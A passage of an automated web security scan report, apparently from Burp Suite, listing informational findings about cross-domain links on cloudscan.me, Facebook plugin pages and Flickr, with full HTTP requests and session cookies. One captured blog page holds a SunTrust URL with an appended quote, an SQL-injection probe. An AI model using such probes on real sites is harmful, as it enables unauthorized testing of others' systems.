...[SNIP]...
<br />
Butterscotch is a division of <a href="http://www.tucows.com">Tucows Inc</a>
...[SNIP]...
<div id="footercopyright">
<a rel="license" href="http://creativecommons.org/licenses/by-nc-nd/3.0/us/"><img alt="Creative Commons License" style="border-width:0" src="/images/assets/cc.gif" width=82 height=17 />
...[SNIP]...
</span> is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-nc-nd/3.0/us/">Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License</a>
...[SNIP]...

18.117. http://www.cloudscan.me/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=white+paper HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Referer: http://www.blogger.com/navbar.g?targetBlogID=722867207364741287&blogName=Penetration+Testing+%7C+Hoyt+LLC&publishMode=PUBLISH_MODE_HOSTED&navbarType=BLUE&layoutType=LAYOUTS&searchRoot=http%3A%2F%2Fwww.cloudscan.me%2Fsearch&blogLocale=en&homepageUrl=http%3A%2F%2Fwww.cloudscan.me%2F
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.5.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:11:01 GMT
Date: Fri, 04 Feb 2011 16:11:01 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 77341

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<meta content='blogger' name='generator'/>
<link href='http://www.blogger.com/favicon.ico' rel='icon' type='image/vnd.microsoft.icon'/>
<link href='http://www.cloudscan.me/search?q=white+paper' rel='canonical'/>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Penetration Testing | Hoyt LLC - RSS" href="http://www.cloudscan.me/feeds/posts/default?alt=rss" />
<link rel="service.post" type="application/atom+xml" title="Penetration Testing | Hoyt LLC - Atom" href="http://www.blogger.com/feeds/722867207364741287/posts/default" />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.blogger.com/rsd.g?blogID=722867207364741287" />
<link rel="me" href="http://www.blogger.com/profile/07990114670666099998" />
<link rel="openid.server" href="http://www.blogger.com/openid-server.g" />
<!--[if IE]>
...[SNIP]...
</title>
<link type='text/css' rel='stylesheet' href='http://www.blogger.com/static/v1/widgets/2744320791-widget_css_2_bundle.css' />
<link rel="stylesheet" type="text/css" href="http://www.blogger.com/dyn-css/authorization.css?targetBlogID=722867207364741287&zx=65b39502-51d6-45a9-bae0-023d7d11e2d4"/>
<style type="text/css">
...[SNIP]...
</script>
<iframe src="http://www.blogger.com/navbar.g?targetBlogID=722867207364741287&amp;blogName=Penetration+Testing+%7C+Hoyt+LLC&amp;publishMode=PUBLISH_MODE_HOSTED&amp;navbarType=BLUE&amp;layoutType=LAYOUTS&amp;searchRoot=http%3A%2F%2Fwww.cloudscan.me%2Fsearch&amp;blogLocale=en&amp;homepageUrl=http%3A%2F%2Fwww.cloudscan.me%2F" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" height="30px" width="100%" id="navbar-iframe" allowtransparency="true" title="Blogger Navigation and Search"></iframe>
...[SNIP]...
<li><a href='http://cdn.cloudscan.us/examples/html/favicon.ico-xss-example.html'>Favicon XSS</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=LinkList&widgetId=LinkList2&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("LinkList2"));' target='configLinkList2' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=Label&widgetId=Label1&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("Label1"));' target='configLabel1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<span class="Apple-style-span" style="font-size: 13.3333px; "><a href="https://www.suntrust.com/portal/server.pt/community/checking_account_selector'/440">https://www.suntrust.com/portal/server.pt/community/checking_account_selector'/440</a>
...[SNIP]...
="center" valign="top" width="80" colspan="1" class="alertErrorTitle" style="color: rgb(255, 0, 0); font: normal normal bold 11px/normal verdana, arial, helvetica, sans-serif; text-decoration: none; "><img src="https://www.suntrust.com/imageserver/plumtree/portal/public/img/icon_error.gif" alt="Error" border="0" height="20" width="20" style="vertical-align: middle; " /></td>
...[SNIP]...
<span class='item-control blog-admin pid-649002305'>
<a href='http://www.blogger.com/post-edit.g?blogID=722867207364741287&postID=2485706836641208110' title='Edit Post'>
<img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
...[SNIP]...
<div class='post-share-buttons'>
<a class='share-button sb-email' href='http://www.blogger.com/share-post.g?blogID=722867207364741287&postID=2485706836641208110&target=email' target='_blank' title='Email This'>
<span class='share-button-link-text'>
...[SNIP]...
</a>
<a class='share-button sb-blog' href='http://www.blogger.com/share-post.g?blogID=722867207364741287&postID=2485706836641208110&target=blog' onclick='window.open(this.href, "_blank", "height=270,width=475"); return false;' target='_blank' title='BlogThis!'>
<span class='share-button-link-text'>
...[SNIP]...
</a>
<a class='share-button sb-twitter' href='http://www.blogger.com/share-post.g?blogID=722867207364741287&postID=2485706836641208110&target=twitter' target='_blank' title='Share to Twitter'>
<span class='share-button-link-text'>
...[SNIP]...
</a>
<a class='share-button sb-facebook' href='http://www.blogger.com/share-post.g?blogID=722867207364741287&postID=2485706836641208110&target=facebook' onclick='window.open(this.href, "_blank", "height=430,width=640"); return false;' target='_blank' title='Share to Facebook'>
<span class='share-button-link-text'>
...[SNIP]...
</a>
<a class='share-button sb-buzz' href='http://www.blogger.com/share-post.g?blogID=722867207364741287&postID=2485706836641208110&target=buzz' onclick='window.open(this.href, "_blank", "height=415,width=690"); return false;' target='_blank' title='Share to Google Buzz'>
<span class='share-button-link-text'>
...[SNIP]...
<td><iframe allowtransparency='true' class='reactions-iframe' frameborder='0' name='reactions' scrolling='no' src='http://www.blogger.com/blog-post-reactions.g?options=%5Bfunny%2C+interesting%2C+cool%5D&amp;textColor=%23666666#http://www.cloudscan.me/2011/02/cwe-200-cwe-89-daily-dork-suntrustcom.html'></iframe>
...[SNIP]...
<span class="TEXT">Reflected <a href="http://cwe.mitre.org/data/definitions/87.html" style="text-decoration: none; color: rgb(61, 116, 165); ">cross-site scripting</a>
...[SNIP]...
</div><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://cdn.cloudscan.us/images/whitepapers.scmagazineuk.com-xss-1.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 537px; height: 586px;" src="http://cdn.cloudscan.us/images/whitepapers.scmagazineuk.com-xss-1.jpg" border="0" alt="XSS in whitepapers.scmagazineuk.com, DORK" /></a>
...[SNIP]...
<li><a href="http://msdn.microsoft.com/en-us/library/cc288472(VS.85).aspx#_replace" target="_blank">MSDN - Internet Explorer 8 Security Features</a>
...[SNIP]...
<li><a href="http://blogs.msdn.com/b/ie/archive/2008/07/01/ie8-security-part-iv-the-xss-filter.aspx" target="_blank">Internet Explorer 8 XSS Filter</a>
...[SNIP]...
<li><a href="http://ha.ckers.org/xss.html" target="_blank">XSS Cheat Sheet</a>
...[SNIP]...
<li><a href="http://www.owasp.org/index.php/Cross_site_scripting" target="_blank">OWASP - Cross-site Scripting</a>
...[SNIP]...
<span class='item-control blog-admin pid-649002305'>
<a href='http://www.blogger.com/post-edit.g?blogID=722867207364741287&postID=132791060324822281' title='Edit Post'>
<img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
...[SNIP]...
<div class='post-share-buttons'>
<a class='share-button sb-email' href='http://www.blogger.com/share-post.g?blogID=722867207364741287&postID=132791060324822281&target=email' target='_blank' title='Email This'>
<span class='share-button-link-text'>
...[SNIP]...
</a>
<a class='share-button sb-blog' href='http://www.blogger.com/share-post.g?blogID=722867207364741287&postID=132791060324822281&target=blog' onclick='window.open(this.href, "_blank", "height=270,width=475"); return false;' target='_blank' title='BlogThis!'>
<span class='share-button-link-text'>
...[SNIP]...
</a>
<a class='share-button sb-twitter' href='http://www.blogger.com/share-post.g?blogID=722867207364741287&postID=132791060324822281&target=twitter' target='_blank' title='Share to Twitter'>
<span class='share-button-link-text'>
...[SNIP]...
</a>
<a class='share-button sb-facebook' href='http://www.blogger.com/share-post.g?blogID=722867207364741287&postID=132791060324822281&target=facebook' onclick='window.open(this.href, "_blank", "height=430,width=640"); return false;' target='_blank' title='Share to Facebook'>
<span class='share-button-link-text'>
...[SNIP]...
</a>
<a class='share-button sb-buzz' href='http://www.blogger.com/share-post.g?blogID=722867207364741287&postID=132791060324822281&target=buzz' onclick='window.open(this.href, "_blank", "height=415,width=690"); return false;' target='_blank' title='Share to Google Buzz'>
<span class='share-button-link-text'>
...[SNIP]...
<td><iframe allowtransparency='true' class='reactions-iframe' frameborder='0' name='reactions' scrolling='no' src='http://www.blogger.com/blog-post-reactions.g?options=%5Bfunny%2C+interesting%2C+cool%5D&amp;textColor=%23666666#http://www.cloudscan.me/2011/01/xss-whitepapersscmagazineukcom-capec-86.html'></iframe>
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=HTML&widgetId=HTML1&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML1"));' target='configHTML1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=HTML&widgetId=HTML2&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML2"));' target='configHTML2' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=Slideshow&widgetId=Slideshow1&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("Slideshow1"));' target='configSlideshow1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=PopularPosts&widgetId=PopularPosts1&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("PopularPosts1"));' target='configPopularPosts1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=Gadget&widgetId=Gadget1&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("Gadget1"));' target='configGadget1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=PageList&widgetId=PageList1&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("PageList1"));' target='configPageList1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<li><a href='http://www.google.com/cse/home?cx=008801388445696029762:5wl5jq9fxnc'>Custom Search | Hoyt LLC Research</a>
...[SNIP]...
<li><a href='http://cloudscan.us/examples/plesk-reports/plesk-smb-10.2.0-nexpose-theplanet-default-install-audit.html'>Plesk SMB 10.2 | NeXpose Report | DOM XSS</a>
...[SNIP]...
<li><a href='http://cdn.cloudscan.us/examples/plesk-reports/plesk-10.2.0-site-editor.html'>Plesk SMB 10.2.x | Site Editor | Windows Report</a>
...[SNIP]...
<li><a href='http://cloudscan.us/plesk-smb-10.2.0.aspx'>Plesk SMB 10.2.x | Windows Server Report</a>
...[SNIP]...
<li><a href='http://cloudscan.us/examples/SM_7.2.3925_Burp_1.3.08.html'>SmarterMail 7.2.3925 Report #1</a>
...[SNIP]...
<li><a href='http://cloudscan.us/examples/SM_7.2.3925_File2_Burp_1.3.08.html'>SmarterMail 7.2.3925 Report #2</a>
...[SNIP]...
<li><a href='http://cloudscan.us/examples/SM_7.2.3925_Stored_XSS_Audit_Example.html'>SmarterMail 7.2.3925 | Stored XSS Example</a>
...[SNIP]...
<li><a href='http://cloudscan.us/crawler.aspx'>Vulnerability Crawler</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=LinkList&widgetId=LinkList1&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("LinkList1"));' target='configLinkList1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=BlogArchive&widgetId=BlogArchive1&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("BlogArchive1"));' target='configBlogArchive1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<span class='inner' onclick='return(_SW_toggleReaderList(event, "Subscribe1POST"));'>
<img class='subscribe-dropdown-arrow' src='http://img2.blogblog.com/img/widgets/arrow_dropdown.gif'/>
<img align='absmiddle' alt='' border='0' class='feed-icon' src='http://img1.blogblog.com/img/icon_feed12.png'/>
Posts
</span>
<div class='feed-reader-links'>
<a class='feed-reader-link' href='http://www.google.com/ig/add?source=bstp&feedurl=http%3A%2F%2Fwww.cloudscan.me%2Ffeeds%2Fposts%2Fdefault' target='_blank'>
<img src='http://img1.blogblog.com/img/widgets/subscribe-google.png'/>
</a>
<a class='feed-reader-link' href='http://www.netvibes.com/subscribe.php?url=http%3A%2F%2Fwww.cloudscan.me%2Ffeeds%2Fposts%2Fdefault' target='_blank'>
<img src='http://img1.blogblog.com/img/widgets/subscribe-netvibes.png'/>
</a>
<a class='feed-reader-link' href='http://www.newsgator.com/ngs/subscriber/subext.aspx?url=http%3A%2F%2Fwww.cloudscan.me%2Ffeeds%2Fposts%2Fdefault' target='_blank'>
<img src='http://img1.blogblog.com/img/widgets/subscribe-newsgator.png'/>
</a>
<a class='feed-reader-link' href='http://add.my.yahoo.com/content?url=http%3A%2F%2Fwww.cloudscan.me%2Ffeeds%2Fposts%2Fdefault' target='_blank'>
<img src='http://img1.blogblog.com/img/widgets/subscribe-yahoo.png'/>
</a>
<a class='feed-reader-link' href='http://www.cloudscan.me/feeds/posts/default' target='_blank'>
<img align='absmiddle' class='feed-icon' src='http://img1.blogblog.com/img/icon_feed12.png'/>
Atom
</a>
...[SNIP]...
<span class='inner'>
<img class='subscribe-dropdown-arrow' src='http://img2.blogblog.com/img/widgets/arrow_dropdown.gif'/>
<span onclick='return(_SW_toggleReaderList(event, "Subscribe1POST"));'>
<img align='absmiddle' alt='' border='0' class='feed-icon' src='http://img1.blogblog.com/img/icon_feed12.png'/>
Posts
</span>
...[SNIP]...
<span class='inner' onclick='return(_SW_toggleReaderList(event, "Subscribe1COMMENT"));'>
<img class='subscribe-dropdown-arrow' src='http://img2.blogblog.com/img/widgets/arrow_dropdown.gif'/>
<img align='absmiddle' alt='' border='0' class='feed-icon' src='http://img1.blogblog.com/img/icon_feed12.png'/>
All Comments
</span>
...[SNIP]...
<div class='feed-reader-links'>
<a class='feed-reader-link' href='http://www.google.com/ig/add?source=bstp&feedurl=http%3A%2F%2Fwww.cloudscan.me%2Ffeeds%2Fcomments%2Fdefault' target='_blank'>
<img src='http://img1.blogblog.com/img/widgets/subscribe-google.png'/>
</a>
<a class='feed-reader-link' href='http://www.netvibes.com/subscribe.php?url=http%3A%2F%2Fwww.cloudscan.me%2Ffeeds%2Fcomments%2Fdefault' target='_blank'>
<img src='http://img1.blogblog.com/img/widgets/subscribe-netvibes.png'/>
</a>
<a class='feed-reader-link' href='http://www.newsgator.com/ngs/subscriber/subext.aspx?url=http%3A%2F%2Fwww.cloudscan.me%2Ffeeds%2Fcomments%2Fdefault' target='_blank'>
<img src='http://img1.blogblog.com/img/widgets/subscribe-newsgator.png'/>
</a>
<a class='feed-reader-link' href='http://add.my.yahoo.com/content?url=http%3A%2F%2Fwww.cloudscan.me%2Ffeeds%2Fcomments%2Fdefault' target='_blank'>
<img src='http://img1.blogblog.com/img/widgets/subscribe-yahoo.png'/>
</a>
<a class='feed-reader-link' href='http://www.cloudscan.me/feeds/comments/default' target='_blank'>
<img align='absmiddle' class='feed-icon' src='http://img1.blogblog.com/img/icon_feed12.png'/>
Atom
</a>
...[SNIP]...
<span class='inner'>
<img class='subscribe-dropdown-arrow' src='http://img2.blogblog.com/img/widgets/arrow_dropdown.gif'/>
<span onclick='return(_SW_toggleReaderList(event, "Subscribe1COMMENT"));'>
<img align='absmiddle' alt='' border='0' class='feed-icon' src='http://img1.blogblog.com/img/icon_feed12.png'/>
All Comments
</span>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=Subscribe&widgetId=Subscribe1&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("Subscribe1"));' target='configSubscribe1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=HTML&widgetId=HTML3&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML3"));' target='configHTML3' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<div class='widget-content' style='text-align: center;'>
Hoyt LLC Research | 2010 | Creative Commons with Attribution ShareAlike. Ethereal template. Powered by <a href='http://www.blogger.com' target='_blank'>Blogger</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=722867207364741287&widgetType=Attribution&widgetId=Attribution1&action=editWidget' onclick='return _WidgetManager._PopupConfig(document.getElementById("Attribution1"));' target='configAttribution1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

18.118. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Fpages%2FThumbshots%2F119367484758046%3Fv%3Dwall&layout=button_count&show_faces=true&width=100&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thumbshots.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Thu, 03 Feb 2011 20:24:23 GMT
Content-Length: 7535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yt/r/CJLVmfhHQeD.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.119. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.smartdraw.com%2Ffilenotfound.aspx%3F404%3Bhttp%3A%2F%2Fwww.smartdraw.com%3A80%2F1d612 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:22 GMT
Content-Length: 9401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yj/r/xX_iDFXECVt.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.120. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /share.php?u=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=vKUFg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%253A%252F%252Fwww.veoh.com%252Fbrowse%252Fvideos%252Fcategory%252Faction_adventure%252Fwatch%252Fv18978294NGnK88j8; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%253A%252F%252Fwww.veoh.com%252Fbrowse%252Fvideos%252Fcategory%252Faction_adventure%252Fwatch%252Fv18978294NGnK88j8; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:17 GMT
Content-Length: 11133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/ye/r/ZveyUJsCpv8.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yR/r/3ltOPQgcfkx.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/y0/r/OtRXPAfGtIS.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...

18.121. http://www.flickr.com/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /search/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/?q=squishycow HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:32 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=39be8d16km8nc&b=3&s=78; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 02-Feb-2014 21:49:32 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Wed, 03-Feb-2010 21:49:31 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Wed, 03-Feb-2010 21:49:31 GMT; path=/; domain=flickr.com
Set-Cookie: search_z=t; expires=Wed, 30-Oct-2013 21:49:32 GMT; path=/; domain=.flickr.com
X-Served-By: www149.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 86772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>squishycow - Flickr: Search</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<meta name="viewport" content="width=1036">


<link type="text/css" rel="stylesheet" href="http://l.yimg.com/g/css/c_fold_main.css.v98862.64777.80377.17">


<link rel="shortcut icon" type="image/ico" href="http://l.yimg.com/g/favicon.ico">

<script>
...[SNIP]...
</script>

